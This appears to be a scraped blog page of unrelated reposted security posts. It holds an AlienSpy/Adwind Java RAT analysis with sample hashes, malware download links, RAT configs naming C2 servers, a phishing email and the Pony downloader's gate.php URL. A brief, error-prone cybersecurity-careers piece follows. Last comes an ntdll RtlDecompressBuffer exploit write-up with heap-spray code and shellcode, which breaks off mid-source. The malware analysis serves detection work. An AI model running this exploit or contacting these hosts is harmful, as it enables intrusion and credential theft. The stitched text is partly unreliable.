los verdaderos reyes de la noche vampiros demonios o angeles de la noche

domingo, 17 de mayo de 2020

AlienSpy Java RAT Samples And Traffic Information

AlienSpy Java based cross platform RAT is another reincarnation of ever popular Unrecom/Adwind and Frutas RATs that have been circulating through 2014.

It appears to be used in the same campaigns as was Unrccom/Adwind - see the references. If C2 responds, the java RAT downloads Jar files containing Windows Pony/Ponik loader. The RAT is crossplatform and installs and beacons from OSX and Linux as well. However, it did not download any additional malware while running on OSX and Linux.

The samples, pcaps, and traffic protocol information are available below.

File information

I
File: DB46ADCFAE462E7C475C171FBE66DF82_paymentadvice.jar
Size: 131178
MD5: DB46ADCFAE462E7C475C171FBE66DF82

File: 01234.exe (Pony loader dropped by FAB8DE636D6F1EC93EEECAADE8B9BC68 - Transfer.jar_
Size: 792122
MD5: B5E7CD42B45F8670ADAF96BBCA5AE2D0

II
File: 79e9dd35aef6558461c4b93cd0c55b76_Purchase Order.jar
Size: 125985
MD5: 79E9DD35AEF6558461C4B93CD0C55B76

III
File: B2856B11FF23D35DA2C9C906C61781BA_purchaseorder.jar
Size: 49084
MD5: b2856b11ff23d35da2c9c906c61781ba

Download

Download. Email me if you need the password

Original jar attachment files
B2856B11FF23D35DA2C9C906C61781BA_purchaseorder.jar
DB46ADCFAE462E7C475C171FBE66DF82_paymentadvice.jar
79e9dd35aef6558461c4b93cd0c55b76_Purchase Order.jar

Pcap files download

AlienSpyRAT_B2856B11FF23D35DA2C9C906C61781BA.pcap

AlienSpyRAT_79E9DD35AEF6558461C4B93CD0C55B76.pcap

Pony_B5E7CD42B45F8670ADAF96BBCA5AE2D0.pcap

AlienspyRAT_DB46ADCFAE462E7C475C171FBE66DF82-OSXLion.pcap

AlienspyRAT_DB46ADCFAE462E7C475C171FBE66DF82-WinXP.pcap

All files with created and downloaded

References

Research:
Boredliner: Cracking obfuscated java code - Adwind 3 << detailed java analysis
Fidelis: RAT in a jar:A phishing campaign using Unrecom May 21, 2014
Crowdstrike: Adwind RAT rebranding
Symantec:Adwind RAT
Symantec: Frutas RAT
Symantec: Ponik/Pony

Java Serialization References:
https://docs.oracle.com/javase/7/docs/platform/serialization/spec/protocol.html
http://www.kdgregory.com/index.php?page=java.serialization
http://staf.cs.ui.ac.id/WebKuliah/java/MasteringJavaBeans/ch11.pdf

Additional File details

Alienspy RAT
The following RAT config strings are extracted from memory dumps. Alienspy RAT is a reincarnated Unrecom/Adwind << Frutas RAT and is available from https://alienspy.net/
As you see by the config, it is very similar to Unrecom/Adwind
File: paymentadvice.jar
Size: 131178

MD5: DB46ADCFAE462E7C475C171FBE66DF82
───paymentadvice.jar
├───META-INF
│ MANIFEST.MF <<MD5: 11691d9f7d585c528ca22f7ba6f4a131 Size: 90
│
├───plugins
│ Server.class <<MD5: 3d9ffbe03567067ae0d68124b5b7b748 Size: 520 << Strings are here
│
└───stub
EcryptedWrapper.class <<MD5: f2701642ac72992c983cb85981a5aeb6 Size: 89870
EncryptedLoader.class <<MD5: 3edfd511873b30d1373a4dc54db336ee Size: 223356
EncryptedLoaderOld.class << MD5: b0ef7ff41caf69d9ae076c605653c4c7 Size: 15816
stub.dll << MD5: 64fb8dfb8d25a0273081e78e7c40ca5e Size: 43648 << Strings are here

Alienspy Rat Config strings
DB46ADCFAE462E7C475C171FBE66DF82
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<comment>AlienSpy</comment>
<entry key="vbox">false</entry>
<entry key="password">a2e74aef2c17329f0e8e8f347c62a6a03d16b944</entry>
<entry key="p2">1079</entry>
<entry key="p1">1077</entry>
<entry key="ps_hacker">false</entry>
<entry key="install_time">2000</entry>
<entry key="taskmgr">false</entry>
<entry key="connetion_time">2000</entry>
<entry key="registryname">GKXeW0Yke7</entry>
<entry key="wireshark">false</entry>
<entry key="NAME">IHEAKA</entry>
<entry key="jarname">unXX0JIhwW</entry>
<entry key="dns">204.45.207.40</entry>
<entry key="ps_explorer">false</entry>
<entry key="msconfig">false</entry>
<entry key="pluginfoldername">m4w6OAI02f</entry>
<entry key="extensionname">xBQ</entry>
<entry key="install">true</entry>
<entry key="win_defender">false</entry>
<entry key="uac">false</entry>
<entry key="jarfoldername">9bor9J6cRd</entry>
<entry key="mutex">xooJlYrm61</entry>
<entry key="prefix">IHEAKA</entry>
<entry key="restore_system">false</entry>
<entry key="vmware">false</entry>
<entry key="desktop">true</entry>
<entry key="reconnetion_time">2000</entry>
</properties>

IP: 204.45.207.40
Decimal: 3425554216
Hostname: 212.clients.instantdedis.com
ISP: FDCservers.net
Country: United States
State/Region: Colorado
City: Denver

79E9DD35AEF6558461C4B93CD0C55B76
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<comment>AlienSpy</comment>
<entry key="pluginfolder">fy0qFUFuLP</entry>
<entry key="reconnetion_time">3000</entry>
<entry key="ps_hacker">true</entry>
<entry key="restore_system">true</entry>
<entry key="pluginfoldername">fy0qFUFuLP</entry>
<entry key="dns">38.89.137.248</entry>
<entry key="install_time">3000</entry>
<entry key="port2">1065</entry>
<entry key="port1">1064</entry>
<entry key="taskmgr">true</entry>
<entry key="vmware">false</entry>
<entry key="jarname">LcuSMagrlF</entry>
<entry key="msconfig">true</entry>
<entry key="mutex">VblVc5kEqY</entry>
<entry key="install">true</entry>
<entry key="instalar">true</entry>
<entry key="vbox">false</entry>
<entry key="password">7110eda4d09e062aa5e4a390b0a572ac0d2c0220</entry>
<entry key="NAME">xmas things</entry>
<entry key="extensionname">7h8</entry>
<entry key="prefix">xmas</entry>
<entry key="jarfoldername">jcwDpUEpCh</entry>
<entry key="uac">true</entry>
<entry key="win_defender">true</entry>
<entry key="

IP: 38.89.137.248
Decimal: 643402232
Hostname: 38.89.137.248
ISP: Cogent Communications
Country: United States us flag

Created Files

DB46ADCFAE462E7C475C171FBE66DF82 paymentadvice.jar

%USERPROFILE%\Application Data\evt88IWdHO\CnREgyvLBS.txt <<MD5: abe6ef71e44d2e145033800d0dccea57 << strings are here (by classes)
%USERPROFILE%\Application Data\evt88IWdHO\Desktop.ini
%USERPROFILE%\Local Settings\Temp\asdqw15727804162199772615555.jar << Strings are here
%USERPROFILE%\Local Settings\Temp\iWimMQLgpsT2624529381479181764.png (seen Transfer.jar in the stream) <<MD5: fab8de636d6f1ec93eeecaade8b9bc68 Size: 755017 << Strings are here

%USERPROFILE%\29OVHAabdr.tmp << timestamp file << Strings are here

\deleted_files\%USERPROFILE%\\29OVHAabdr.tmp << timestamp file << Strings are here

\deleted_files\%USERPROFILE%\\Application Data\9bor9J6cRd\Desktop.ini << Strings are here

\deleted_files\%USERPROFILE%\\Application Data\9bor9J6cRd\unXX0JIhwW.txt << MD5: DB46ADCFAE462E7C475C171FBE66DF82 < original jar << Strings are here

\deleted_files\%USERPROFILE%\\Local Settings\Temp\14583359.bat << Strings are here

\deleted_files\%USERPROFILE%\\Local Settings\Temp\asdqw4727319084772952101234.exe << Pony Downloader MD5: b5e7cd42b45f8670adaf96bbca5ae2d0 Size: 792122 < Strings are here

\deleted_files\%USERPROFILE%\\Local Settings\Temp\OiuFr7LcfXq1847924646026958055.vbs <<MD5: 9E1EDE0DEDADB7AF34C0222ADA2D58C9 Strings are here

\deleted_files\%USERPROFILE%\\xooJlYrm61.tmp < timestamp file << Strings are here

\deleted_files\C\WINDOWS\tem.txt - 0bytes

IWIMMQLGPST2624529381479181764.PNG MD5: fab8de636d6f1ec93eeecaade8b9bc68

├───com

│   └───java

│       │   Main.class << MD5:  d020b9fdac0139d43997f9ec14fa5947 Size: 7232

│       │   Manifest.mf << MD5:  a396d2898e8a83aa5233c4258de006e3 Size: 750412

│               │   01234.exe << MD5:  b5e7cd42b45f8670adaf96bbca5ae2d0 Size: 792122

│               │   15555.jar << MD5:  abe6ef71e44d2e145033800d0dccea57 Size: 50922

│               │

│               └───15555

│                   │   ID

│                   │   Main.class << MD5:  d020b9fdac0139d43997f9ec14fa5947 Size: 7232

│                   │   MANIFEST.MF << MD5:  a396d2898e8a83aa5233c4258de006e3 Size: 750412

│                   │

│                   ├───META-INF

│                   └───plugins

└───META-INF

        MANIFEST.MF << MD5:  042c2fa9077d96478ce585d210641d9a Size: 171

File types

14583359.bat (.txt) "Text file"
29OVHAabdr.tmp (.txt) "Text file"
asdqw15727804162199772615555.jar (.zip) "PKZIP Compressed"
asdqw4727319084772952101234.exe (.exe) "Executable File"
CnREgyvLBS.txt (.zip) "PKZIP Compressed"
Desktop.ini (.txt) "Text file"
DFR5.tmp (.txt) "Text file"
iWimMQLgpsT2624529381479181764.png (.zip) "Zip Compressed"
iWimMQLgpsT2624529381479181764.png (.zip) "PKZIP Compressed"
OiuFr7LcfXq1847924646026958055.vbs (.txt) "Vbs script file"
tem.txt (.txt) "Text file"
unXX0JIhwW.txt (.zip) "PKZIP Compressed"
xooJlYrm61.tmp (.txt) "Text file"

79e9dd35aef6558461c4b93cd0c55b76 Purchase Order.jar

Received: from magix-webmail (webmail.app.magix-online.com [193.254.184.250])

by smtp.app.magix-online.com (Postfix) with ESMTPSA id B626052E77F;

Sun, 16 Nov 2014 14:54:06 +0100 (CET)

Received: from 206.217.192.188 ([206.217.192.188]) by

webmail.magix-online.com (Horde Framework) with HTTP; Sun, 16 Nov 2014

14:54:06 +0100

Date: Sun, 16 Nov 2014 14:54:06 +0100

Message-ID: <20141116145406.Horde.YL7L4Bi7ap6_NXm76DDEaw2@webmail.magix-online.com>

From: Outokumpu Import Co Ltd <purchase@brentyil.org>

Subject: Re: Confirm correct details

Reply-to: jingwings@outlook.com

User-Agent: Internet Messaging Program (IMP) H5 (6.1.4)

Content-Type: multipart/mixed; boundary="=_FMdois7zoq7xTAV91epZoQ6"

MIME-Version: 1.0

Content-Transfer-Encoding: 8bit

This message is in MIME format.

--=_FMdois7zoq7xTAV91epZoQ6

Content-Type: text/plain; charset=UTF-8; format=flowed; DelSp=Yes

Content-Disposition: inline

Content-Transfer-Encoding: 8bit

Dear Sir,

Please confirm the attached purchase order for your reference.

Please acknowledge Invoice for the final confirmation and confirm

details are correct so we can proceed accordingly.

Please give me feedback through this email.

IBRAHIM MOHAMMAD AL FAR

Area Manager

Central Region

Outokumpu Import Co Ltd

Tel: +966-11-265-2030

Fax: +966-11-265-0350

Mob: +966-50 610 8743

P.O Box: 172 Riyadh 11383

Kingdom of Saudi Arabia

--=_FMdois7zoq7xTAV91epZoQ6

Content-Type: application/java-archive; name="Purchase Order.jar"

Content-Description: Purchase Order.jar

Content-Disposition: attachment; size=125985; filename="Purchase Order.jar"

Content-Transfer-Encoding: base64

File paths

%USERPROFILE%\Application Data\jcwDpUEpCh\Desktop.ini

%USERPROFILE%\Application Data\jcwDpUEpCh\LcuSMagrlF.txt
%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014111620141117\index.dat
%USERPROFILE%\Local Settings\Temp\hsperfdata_Laura\3884
%USERPROFILE%\VblVc5kEqY.tmp
deleted_files\%USERPROFILE%\Local Settings\Temp\TaskNetworkGathor267205042636993976.reg
deleted_files\%USERPROFILE%\VblVc5kEqY.tmp
deleted_files\C\WINDOWS\tem.txt

File types
Desktop.ini (.txt) "Text file"
index.dat (.txt) "Text file"
LcuSMagrlF.txt (.zip) "PKZIP Compressed"
TaskNetworkGathor267205042636993976.reg (.txt) "Text file"
tem.txt (.txt) "Text file"
VblVc5kEqY.tmp (.txt) "Text file"

MD5 list
Desktop.ini e783bdd20a976eaeaae1ff4624487420
index.dat b431d50792262b0ef75a3d79a4ca4a81
LcuSMagrlF.txt 79e9dd35aef6558461c4b93cd0c55b76
79e9dd35aef6558461c4b93cd0c55b76.malware 79e9dd35aef6558461c4b93cd0c55b76
TaskNetworkGathor267205042636993976.reg 6486acf0ca96ecdc981398855255b699 << Strings are here
tem.txt d41d8cd98f00b204e9800998ecf8427e
VblVc5kEqY.tmp b5c6ea9aaf042d88ee8cd61ec305880b

III
B2856B11FF23D35DA2C9C906C61781BA Purchase Order.jar
File paths
%USERPROFILE%\Application Data\Sys32\Desktop.ini
%USERPROFILE%\Application Data\Sys32\Windows.jar.txt
%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014111620141117\index.dat
%USERPROFILE%\Local Settings\Temp\hsperfdata_Laura\1132
%USERPROFILE%\WWMI853JfC.tmp
deleted_files\%USERPROFILE%\Local Settings\Temp\TaskNetworkGathor7441169770678304780.reg
deleted_files\%USERPROFILE%\Local Settings\History\History.IE5\MSHist012013110920131110\index.dat
deleted_files\%USERPROFILE%\WWMI853JfC.tmp
deleted_files\C\DFRA.tmp

deleted_files\C\WINDOWS\tem

File type list
Desktop.ini (.txt) "Text file"
DFRA.tmp (.txt) "Text file"
index.dat (.txt) "Text file"
TaskNetworkGathor7441169770678304780.reg (.txt) "Text file"
tem (.txt) "Text file"
Windows.jar.txt (.zip) "PKZIP Compressed"

WWMI853JfC.tmp (.txt) "Text file"

MD5 list
Desktop.ini e783bdd20a976eaeaae1ff4624487420
DFRA.tmp d41d8cd98f00b204e9800998ecf8427e
index.dat b431d50792262b0ef75a3d79a4ca4a81
purchase.jar b2856b11ff23d35da2c9c906c61781ba
TaskNetworkGathor7441169770678304780.reg 311af3b9a52ffc58f46ad83afb1e93b6
tem d41d8cd98f00b204e9800998ecf8427e
Windows.jar.txt b2856b11ff23d35da2c9c906c61781ba
WWMI853JfC.tmp 8e222c61fc55c230407ef1eb21a7daa9

Traffic Information

Java Serialization Protocol traffic info

DB46ADCFAE462E7C475C171FBE66DF82 traffic capture - Windows XP
00000000 ac ed 00 05 ....
00000000 ac ed 00 05 ....
00000004 75 72 00 02 5b 42 ac f3 17 f8 06 08 54 e0 02 00 ur..[B.. ....T...
00000014 00 .
00000015 78 70 00 00 03 2a 1f 8b 08 00 00 00 00 00 00 00 xp...*.. ........
00000025 6d 54 dd 8e d3 46 18 1d 12 16 b2 bb 59 40 fc 5d mT...F.. ....Y@.]
00000035 bb 52 2b 71 83 d7 76 1c 3b a1 12 10 58 16 36 2c .R+q..v. ;...X.6,
00000045 14 95 56 1b 24 4b d6 17 7b 9c cc 66 3c e3 ce 8c ..V.$K.. {..f<...
00000055 d7 a6 17 7d 8e 3e 44 1f a0 12 2f c1 43 f4 b6 ef ...}.>D. ../.C...
00000065 d0 cf 6c 76 1d 2a 22 d9 19 7b be 9f 73 be 73 c6 ..lv.*". .{..s.s.
00000075 7f fd 4b b6 b4 22 77 4f e1 0c ec d2 30 6e bf 53 ..K.."wO ....0n.S

DB46ADCFAE462E7C475C171FBE66DF82 traffic capture - OSX Lion
00000000 ac ed 00 05 ....
00000000 ac ed 00 05 ....
00000004 75 72 00 02 5b 42 ac f3 17 f8 06 08 54 e0 02 00 ur..[B.. ....T...
00000014 00 .
00000015 78 70 00 00 03 33 1f 8b 08 00 00 00 00 00 00 00 xp...3.. ........
00000025 75 54 cd 6e db 46 10 de c8 b5 2d ff 26 c8 1f 7a uT.n.F.. ..-.&..z
00000035 54 0f 45 7b d1 92 5c d1 94 89 02 4d 94 c0 b1 a5 T.E{..\. ...M....
00000045 d8 4d 51 23 89 73 22 56 dc a5 b5 16 b9 cb ec 2e .MQ#.s"V ........

B2856B11FF23D35DA2C9C906C61781BA on Windows XP
00000000 ac ed 00 05 ....
00000000 ac ed 00 05 ....
00000004 75 72 00 02 5b 42 ac f3 17 f8 06 08 54 e0 02 00 ur..[B.. ....T...
00000014 00 .
00000015 78 70 00 00 03 63 1f 8b 08 00 00 00 00 00 00 00 xp...c.. ........
00000025 6d 54 5d 6e db 46 10 de 48 91 2d db 8a 13 24 41 mT]n.F.. H.-...$A
00000035 fa ca 3e 14 08 0a 84 e6 bf a4 16 68 9a c4 75 1b ..>..... ...h..u.
00000045 c3 6e 0d b8 85 13 80 00 31 22 57 d2 5a e4 ee 76 .n...... 1"W.Z..v

79E9DD35AEF6558461C4B93CD0C55B76 - Windows XP
00000000 ac ed 00 05 ....
00000000 ac ed 00 05 ....
00000004 75 72 00 02 5b 42 ac f3 17 f8 06 08 54 e0 02 00 ur..[B.. ....T...
00000014 00 .
00000015 78 70 00 00 03 69 1f 8b 08 00 00 00 00 00 00 00 xp...i.. ........
00000025 6d 54 dd 6e db 36 14 66 ed fc 38 89 9b 16 ed d0 mT.n.6.f ..8.....
00000035 de 6a 17 03 8a 01 53 28 d9 92 ed 0d e8 d6 34 71 .j....S( ......4q

00000045 b6 c0 19 02 64 69 3b c0 80 70 2c d1 36 6d 4a 62 ....di;. .p,.6mJb

Serialization Protocol decoding:

The following fields are part of the serialization protocol and are 'benign" and common.

AC ED (¬í) - Java Serialization protocol magic STREAM_MAGIC = (short)0xaced.
00 05 - Serialization Version STREAM_VERSION
75 (u) - Specifies that this is a new array - newArray: TC_ARRAY
72 (r) - Specifies that this is a new class - newClassDesc: TC_CLASSDESC
00 02 - Length of the class name
5B 42 AC F3 17 F8 06 08 54 E0 ([B¬ó.ø..Tà) This is a Serial class name and version identifier section but data appears to be encrypted
02 00 - Is Serializable Flag - SC_SERIALIZABLE
78 70 (xp) - some low-level information identifying serialized fields
1f 8b 08 00 00 00 00 00 00 00 - GZIP header as seen in the serialization stream

As you see, all Windows traffic captures have identical fields following the GZIP stream, while OSX traffic has different data. The jar files that had Pony Downloader payload did not have other OSX malware packaged and I saw no activity on OSX other than calling the C2 and writing to the randomly named timestamp file (e.g VblVc5kEqY.tmp - updating current timestamp in Unix epoch format)

Combination of the Stream Magic exchange, plus all other benign fields in this order will create a usable signature. However, it will be prone to false positives unless you use fields after the GZIP header for OS specific signatures

Another signature can be based on the transfer. jar download as seen below

DB46ADCFAE462E7C475C171FBE66DF82 - downloading fab8de636d6f1ec93eeecaade8b9bc68
iWimMQLgpsT2624529381479181764.png (seen Transfer.jar in the stream) , which contains 15555.jar in Manifest.mf, which contains 15555.exe (Pony loader) in its' Manfest.mf

IHEAKA _000C297 << IHEAKA is the name of the RAT client, it is different in each infection.

00000000 ac ed 00 05 ....
00000000 ac ed 00 05 ....
00000004 77 04 w.
00000006 00 00 00 01 ....
0000000A 77 15 w.
0000000C 00 13 49 48 45 41 4b 41 5f 30 30 30 43 32 39 37 ..IHEAKA _000C297
0000001C 42 41 38 44 41 BA8DA
00000004 77 0e 00 0c 54 72 61 6e 73 66 65 72 2e 6a 61 72 w...Tran sfer.jar
00000014 7a 00 00 04 00 50 4b 03 04 14 00 08 08 08 00 46 z....PK. .......F
00000024 0c 71 45 00 00 00 00 00 00 00 00 00 00 00 00 14 .qE..... ........
00000034 00 04 00 4d 45 54 41 2d 49 4e 46 2f 4d 41 4e 49 ...META- INF/MANI
00000044 46 45 53 54 2e 4d 46 fe ca 00 00 4d 8d 4d 0b c2 FEST.MF. ...M.M..

---- snip----

000ABBA0 00 09 00 00 00 31 35 35 35 35 2e 6a 61 72 74 97 .....155 55.jart.
000ABBB0 43 70 26 8c a2 44 63 db 9c d8 b6 9d 7c b1 6d db Cp&..Dc. ....|.m.
000ABBC0 c6 c4 b6 6d db b6 6d db 99 d8 76 f2 fe e5 dd bc ...m..m. ..v.....

Pony downloader traffic

HTTP requests
URL: http://meetngreetindia.com/scala/gate.php
TYPE: POST
USER AGENT: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
URL: http://meetngreetindia.com/scala/gate.php
TYPE: GET
USER AGENT: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
DNS requests
meetngreetindia.com (50.28.15.25)
TCP connections
50.28.15.25:80

IP: 50.28.15.25
Decimal: 840699673
Hostname: mahanadi3.ewebguru.net
ISP: Liquid Web
Organization: eWebGuru
State/Region: Michigan
City: Lansing

https://www.virustotal.com/en/ip-address/50.28.15.25/information/

IP-Domain Information

I
DB46ADCFAE462E7C475C171FBE66DF82 paymentadvice.jar

IP: 204.45.207.40
Decimal: 3425554216
Hostname: 212.clients.instantdedis.com
ISP: FDCservers.net
Country: United States
State/Region: Colorado
City: Denver

meetngreetindia.com (50.28.15.25)
TCP connections
50.28.15.25:80
Decimal: 840699673
Hostname: mahanadi3.ewebguru.net
ISP: Liquid Web
Organization: eWebGuru
State/Region: Michigan
City: Lansing

II
79E9DD35AEF6558461C4B93CD0C55B76 Purchase order.jar
IP: 38.89.137.248
Decimal: 643402232
Hostname: 38.89.137.248
ISP: Cogent Communications
Country: United States us flag

III
2856B11FF23D35DA2C9C906C61781BA Purchase order.jar
installone.no-ip.biz
IP Address: 185.32.221.17
Country: Switzerland
Network Name: CH-DATASOURCE-20130812
Owner Name: Datasource AG
From IP: 185.32.220.0
To IP: 185.32.223.255
Allocated: Yes
Contact Name: Rolf Tschumi
Address: mgw online service, Roetihalde 12, CH-8820 Waedenswil
Email: rolf.tschumi@mgw.ch
Abuse Email: abuse@softplus.net

Virustotal

https://www.virustotal.com/en/file/02d1e6dd2f3eecf809d8cd43b5b49aa76c6f322cf4776d7b190676c5f12d6b45/analysis/SHA256: 02d1e6dd2f3eecf809d8cd43b5b49aa76c6f322cf4776d7b190676c5f12d6b45
MD5 db46adcfae462e7c475c171fbe66df82
SHA1 2b43211053d00147b2cb9847843911c771fd3db4
SHA256 02d1e6dd2f3eecf809d8cd43b5b49aa76c6f322cf4776d7b190676c5f12d6b45
ssdeep3072:VR/6ZQvChcDfJNBOFJKMRXcCqfrCUMBpXOg84WoUeonNTFN:LdvCGJN0FJ1RXcgBpXOjOjSNTFN
File size 128.1 KB ( 131178 bytes )
File type ZIP
Magic literalZip archive data, at least v2.0 to extract
TrID ZIP compressed archive (100.0%)
File name: Payment Advice.jar
Detection ratio: 6 / 54
Analysis date: 2014-11-16 20:58:08 UTC ( 1 day, 4 hours ago )
Ikarus Trojan.Java.Adwind 20141116
TrendMicro JAVA_ADWIND.XXO 20141116
TrendMicro-HouseCall JAVA_ADWIND.XXO 20141116
DrWeb Java.Adwind.3 20141116
Kaspersky HEUR:Trojan.Java.Generic 20141116
ESET-NOD32 a variant of Java/Adwind.T 20141116

https://www.virustotal.com/en/file/733c037f886d91b6874ac4a2de5b32ca1e7f7f992928b01579b76603b233110c/analysis/1416194595/
SHA256: 733c037f886d91b6874ac4a2de5b32ca1e7f7f992928b01579b76603b233110c
MD5 fab8de636d6f1ec93eeecaade8b9bc68
File name: iWimMQLgpsT2624529381479181764.png
Detection ratio: 23 / 53
Analysis date: 2014-11-17 03:23:15 UTC ( 0 minutes ago )
AVG Zbot.URE 20141116
Qihoo-360 Win32/Trojan.fff 20141117
ESET-NOD32 Win32/PSW.Fareit.A 20141117
Fortinet W32/Inject.SXVW!tr 20141117
Antiy-AVL Trojan[PSW]/Win32.Tepfer 20141117
AVware Trojan.Win32.Generic!BT 20141117
DrWeb Trojan.PWS.Stealer.13319 20141117
Symantec Trojan.Maljava 20141117
McAfee RDN/Generic Exploit!1m3 20141117
McAfee-GW-Edition RDN/Generic Exploit!1m3 20141117
Sophos Mal/JavaJar-A 20141117
Avast Java:Malware-gen [Trj] 20141117
Cyren Java/Agent.KS 20141117
F-Prot Java/Agent.KS 20141117
Kaspersky HEUR:Trojan.Java.Generic 20141117
Emsisoft Gen:Variant.Kazy.494557 (B) 20141117
Ad-Aware Gen:Variant.Kazy.494557 20141117
BitDefender Gen:Variant.Kazy.494557 20141117
F-Secure Gen:Variant.Kazy.494557 20141116
GData Gen:Variant.Kazy.494557 20141117
MicroWorld-eScan Gen:Variant.Kazy.494557 20141117
Ikarus Exploit.Java.Agent 20141117
Norman Adwind.E 20141116

https://www.virustotal.com/en/file/91d71b06c99fe25271ba19c1c47c2d1ba85e78c2d7d5ae74e97417dc958dc725/analysis/
MD5 b5e7cd42b45f8670adaf96bbca5ae2d0
SHA256: 91d71b06c99fe25271ba19c1c47c2d1ba85e78c2d7d5ae74e97417dc958dc725
File name: asdqw4727319084772952101234.exe
Detection ratio: 12 / 54
Analysis date: 2014-11-17 03:21:30 UTC
AVG Zbot.URE 20141116
AVware Trojan.Win32.Generic!BT 20141117
Ad-Aware Gen:Variant.Kazy.494557 20141117
Antiy-AVL Trojan[PSW]/Win32.Tepfer 20141116
BitDefender Gen:Variant.Kazy.494557 20141117
DrWeb Trojan.PWS.Stealer.13319 20141117
ESET-NOD32 Win32/PSW.Fareit.A 20141117
Emsisoft Gen:Variant.Kazy.494557 (B) 20141117
F-Secure Gen:Variant.Kazy.494557 20141116
GData Gen:Variant.Kazy.494557 20141117
MicroWorld-eScan Gen:Variant.Kazy.494557 20141117
Qihoo-360 Win32/Trojan.fff 20141117

sábado, 16 de mayo de 2020

What Is Cybersecurity And Thier types?Which Skills Required To Become A Top Cybersecurity Expert ?

What is cyber security in hacking?

The term cyber security refers to the technologies and processes designed to defend computer system, software, networks & user data from unauthorized access, also from threats distributed through the internet by cybercriminals,terrorist groups of hacker.

Main types of cybersecurity are

Critical infrastructure security

Application security

Network Security

Cloud Security

Internet of things security.

These are the main types of cybersecurity used by cybersecurity expert to any organisation for safe and protect thier data from hack by a hacker.

Top Skills Required to become Cybersecurity Expert-

Problem Solving Skills

Communication Skill

Technical Strength & Aptitude

Desire to learn

Attention to Detail

Knowledge of security across various platforms

Knowledge of Hacking

Fundamental Computer Forensic Skill.

These skills are essential for become a cybersecurity expert.

Cyber cell and IT cell these are the department in our india which provide cybersecurity and looks into the matters related to cyber crimes to stop the crime because in this digitilization world cyber crime increasing day by day so our government of india also takes the immediate action to prevent the cybercrimes with the help of these departments and also arrest the victim and file a complain against him/her with the help of cyberlaw in our constitution.

RtlDecompresBuffer Vulnerability

Introduction

The RtlDecompressBuffer is a WinAPI implemented on ntdll that is often used by browsers and applications and also by malware to decompress buffers compressed on LZ algorithms for example LZNT1.

The first parameter of this function is a number that represents the algorithm to use in the decompression, for example the 2 is the LZNT1. This algorithm switch is implemented as a callback table with the pointers to the algorithms, so the boundaries of this table must be controlled for avoiding situations where the execution flow is redirected to unexpected places, specially controlled heap maps.

The algorithms callback table

Notice the five nops at the end probably for adding new algorithms in the future.

The way to jump to this pointers depending on the algorithm number is:
call RtlDecompressBufferProcs[eax*4]

The bounrady checks

We control eax because is the algorithm number, but the value of eax is limited, let's see the boudary checks:

int  RtlDecompressBuffer(unsigned __int8 algorithm, int a2, int a3, int a4, int a5, int a6)
{
  int result; // eax@4

  if ( algorithm & algorithm != 1 )
  {
    if ( algorithm & 0xF0 )
      result = -1073741217;
    else
      result = ((int (__stdcall *)(int, int, int, int, int))RtlDecompressBufferProcs[algorithm])(a2, a3, a4, a5, a6);
  }
  else
  {
    result = -1073741811;
  }
  return result;
}

Regarding that decompilation seems that we can only select algorithm number from 2 to 15, regarding that the algorithm 9 is allowed and will jump to 0x90909090, but we can't control that addess.

let's check the disassembly on Win7 32bits:

the movzx limits the boundaries to 16bits
the test ax, ax avoids the algorithm 0
the cmp ax, 1 avoids the algorithm 1
the test al, 0F0h limits the boundary .. wait .. al?

Let's calc the max two bytes number that bypass the test al, F0h

unsigned int max(void) {
__asm__("xorl %eax, %eax");
__asm__("movb $0xff, %ah");
__asm__("movb $0xf0, %al");
}

int main(void) {
printf("max: %u\n", max());
}

The value is 65520, but the fact is that is simpler than that, what happens if we put the algorithm number 9?

So if we control the algorithm number we can redirect the execution flow to 0x55ff8890 which can be mapped via spraying.

Proof of concept

This exploit code, tells to the RtlDecompresBuffer to redirect the execution flow to the address 0x55ff8890 where is a map with the shellcode. To reach this address the heap is sprayed creating one Mb chunks to reach this address.

The result on WinXP:

The result on Win7 32bits:

And the exploit code:

/*
    ntdll!RtlDecompressBuffer() vtable exploit + heap spray
    by @sha0coder

*/

#include 
#include 
#include 

#define KB  1024
#define MB  1024*KB
#define BLK_SZ 4096
#define ALLOC 200
#define MAGIC_DECOMPRESSION_AGORITHM 9

// WinXP Calc shellcode from http://shell-storm.org/shellcode/files/shellcode-567.php
/*
unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93"
"\xBF\x77\xFF\xD2\xCC"
"\xE8\xF3\xFF\xFF\xFF"
"\x63\x61\x6C\x63";
*/

// https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
char *shellcode =
       "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
       "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
       "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
       "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
       "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
       "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
       "\x45\x81\x3e\x43\x72\x65\x61\x75"
       "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
       "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
       "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
       "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
       "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
       "\x6c\x63\x89\xe2\x52\x52\x53\x53"
       "\x53\x53\x53\x53\x52\x53\xff\xd7";


PUCHAR landing_ptr = (PUCHAR)0x55ff8b90; // valid for Win7 and WinXP 32bits

void fail(const char *msg) {
  printf("%s\n\n", msg);
  exit(1);
}

PUCHAR spray(HANDLE heap) {
  PUCHAR map = 0;

  printf("Spraying ...\n");
  printf("Aproximating to %p\n", landing_ptr);

  while (map < landing_ptr-1*MB) {
    map = HeapAlloc(heap, 0, 1*MB);
  }

  //map = HeapAlloc(heap, 0, 1*MB);

  printf("Aproximated to [%x - %x]\n", map, map+1*MB);


  printf("Landing adddr: %x\n", landing_ptr);
  printf("Offset of landing adddr: %d\n", landing_ptr-map);

  return map;
}

void landing_sigtrap(int num_of_traps) {
  memset(landing_ptr, 0xcc, num_of_traps);
}

void copy_shellcode(void) {
